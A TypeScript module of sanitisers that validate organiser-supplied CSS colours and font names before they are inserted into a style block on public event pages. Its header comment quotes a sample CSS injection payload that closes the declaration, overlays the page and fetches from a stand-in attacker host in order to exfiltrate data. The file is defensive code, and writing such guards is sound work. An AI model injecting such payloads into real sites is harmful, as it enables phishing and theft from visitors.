/**
 * Guards for organiser-controlled values that are interpolated into a
 * `<style dangerouslySetInnerHTML>` block on public event pages.
 *
 * Landing theme colours are written straight from the request body by
 * /api/events/[eventId]/landing-theme with no validation, stored in
 * events.metadata.landingThemeCustomColors, and then interpolated into CSS in
 * ThemedEventPage. Unvalidated, a colour of:
 *
 *   red; } body::before { content:''; position:fixed; inset:0;
 *   background:url('//attacker/steal') } .x {
 *
 * closes the declaration and appends arbitrary rules to the organiser's own
 * public page: a full-page overlay for phishing, or a remote fetch used to
 * exfiltrate what is on the page. The page is served from our domain, so it
 * borrows our credibility.
 *
 * Sanitising at the point of USE rather than only on the write path is
 * deliberate: colours reach the renderer from several places (the landing
 * theme route, GTM brand tokens, website scraping, staff/me), and rows written
 * before this shipped are already in the database.
 */

/** #rgb, #rgba, #rrggbb, #rrggbbaa */
const HEX = /^#(?:[0-9a-f]{3,4}|[0-9a-f]{6}|[0-9a-f]{8})$/i;

/** rgb/rgba/hsl/hsla with numeric, percentage or decimal arguments only. */
const FUNCTIONAL = /^(?:rgb|rgba|hsl|hsla)\(\s*[-0-9.%,\s/degradturn]+\)$/i;

/** The handful of bare keywords the themes actually use. */
const KEYWORDS = new Set([
  'transparent', 'currentcolor', 'inherit', 'initial', 'unset',
  'white', 'black', 'red', 'green', 'blue', 'grey', 'gray', 'none',
]);

/**
 * Return `value` when it is unambiguously a CSS colour, otherwise `fallback`.
 *
 * Note the codebase appends opacity suffixes to hex colours (`colors.text + '33'`),
 * so 8-digit hex must stay valid.
 */
export function safeCssColor(value: unknown, fallback: string): string {
  if (typeof value !== 'string') return fallback;
  const v = value.trim();
  if (!v || v.length > 64) return fallback;
  // No construct that could terminate the declaration or start a new rule.
  if (/[;{}<>\\@]/.test(v)) return fallback;
  if (HEX.test(v)) return v;
  if (FUNCTIONAL.test(v)) return v;
  if (KEYWORDS.has(v.toLowerCase())) return v;
  return fallback;
}

/**
 * Font families are organiser-supplied too (uploaded fonts, scraped sites).
 * Quoted names are allowed; anything that could escape the declaration is not.
 */
export function safeCssFontFamily(value: unknown, fallback: string): string {
  if (typeof value !== 'string') return fallback;
  const v = value.trim();
  if (!v || v.length > 200) return fallback;
  if (/[;{}<>\\@]/.test(v)) return fallback;
  // Letters, digits, spaces, hyphens, underscores, dots, commas and quotes.
  if (!/^[-\w\s.,'"()]+$/.test(v)) return fallback;
  return v;
}

/**
 * A single font NAME that will be embedded inside quotes, as in
 * `'${name}', sans-serif`.
 *
 * Stricter than safeCssFontFamily: quotes are rejected outright, because a
 * name containing one closes the quoted string and everything after it is
 * parsed as CSS.
 */
export function safeCssFontName(value: unknown, fallback = ''): string {
  if (typeof value !== 'string') return fallback;
  const v = value.trim();
  if (!v || v.length > 100) return fallback;
  // Letters, digits, spaces, hyphens, underscores and dots only.
  if (!/^[-\w\s.]+$/.test(v)) return fallback;
  return v;
}

/**
 * Sanitise a whole theme colour map in one go, so callers cannot forget an
 * individual key. Unknown keys are kept but sanitised against `fallback`.
 */
export function safeCssColors<T extends Record<string, unknown>>(
  colors: T,
  fallback = '#000000',
): { [K in keyof T]: string } {
  const out: Record<string, string> = {};
  for (const [key, value] of Object.entries(colors ?? {})) {
    out[key] = safeCssColor(value, fallback);
  }
  return out as { [K in keyof T]: string };
}
